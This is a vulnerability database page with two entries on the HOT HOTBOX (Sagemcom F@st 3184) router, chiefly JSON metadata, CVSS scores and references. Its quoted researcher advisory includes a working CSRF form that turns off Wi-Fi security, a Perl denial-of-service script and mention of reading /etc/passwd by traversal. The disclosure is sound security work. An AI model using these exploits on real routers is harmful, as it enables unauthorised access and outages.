Search

Find a vulnerability

Search criteria

    18 vulnerabilities by hot

    VAR-201312-0132

    Vulnerability from variot - Updated: 2025-04-11 22:48

    The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

    Vulnerabilities List -

    Default WPS Pin

    Authentication based on IP Address

    DoS via crafted POST

    Path/Directory Traversal

    Script injection via DHCP request

    No CSRF Token

    Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

    CSRF EXPLOIT:

    document.getElementById(1).submit();

    DENIAL OF SERVICE EXPLOIT:

    use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

    Author: Oz Elisyan

    Date: 3 September 2013

    Affected Version: <= 2.1.11

    print "# HOTBOX DoS PoC #\n\n"

    unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

    print "Sending Evil POST request...\n";

    my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

    print "Done.";

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0132",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 3.0,
            "vendor": "hot",
            "version": "2.1.11"
          },
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "hotbox router",
            "scope": null,
            "trust": 0.8,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "f@st router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sagecom",
            "version": "31842.1.11"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:hot:hotbox_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oz Elisyan",
        "sources": [
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2013-5038",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "CVE-2013-5038",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2014-00016",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "VHN-65040",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-5038",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-5038",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00016",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201312-561",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-65040",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of      |\n|  HOT Cable communication company in israel.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-65040",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-5038",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "123901",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "63550",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29518",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "id": "VAR-201312-0132",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:26.906000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.hot.net.il/heb/Main/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.youtube.com/watch?v=cplt09zij48"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5038"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5038"
          },
          {
            "trust": 0.3,
            "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2013/nov/17"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
          },
          {
            "trust": 0.1,
            "url": "http://$host/goform/login\";"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxcsrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxdos.pl,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "date": "2013-11-04T13:03:33",
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "date": "2013-12-30T04:53:07.177000",
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00016"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65040"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-5038"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "HOT HOTBOX Router Vulnerabilities in software that bypass authentication",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005732"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-561"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201312-0375

    Vulnerability from variot - Updated: 2025-04-11 22:48

    Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

    Vulnerabilities List -

    Default WPS Pin

    Authentication based on IP Address

    DoS via crafted POST

    Path/Directory Traversal

    Script injection via DHCP request

    No CSRF Token

    Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

    CSRF EXPLOIT:

    document.getElementById(1).submit();

    DENIAL OF SERVICE EXPLOIT:

    use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

    Author: Oz Elisyan

    Date: 3 September 2013

    Affected Version: <= 2.1.11

    print "# HOTBOX DoS PoC #\n\n"

    unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

    print "Sending Evil POST request...\n";

    my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

    print "Done.";

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0375",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 3.0,
            "vendor": "hot",
            "version": "2.1.11"
          },
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "hotbox router",
            "scope": null,
            "trust": 0.8,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "f@st router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sagecom",
            "version": "31842.1.11"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
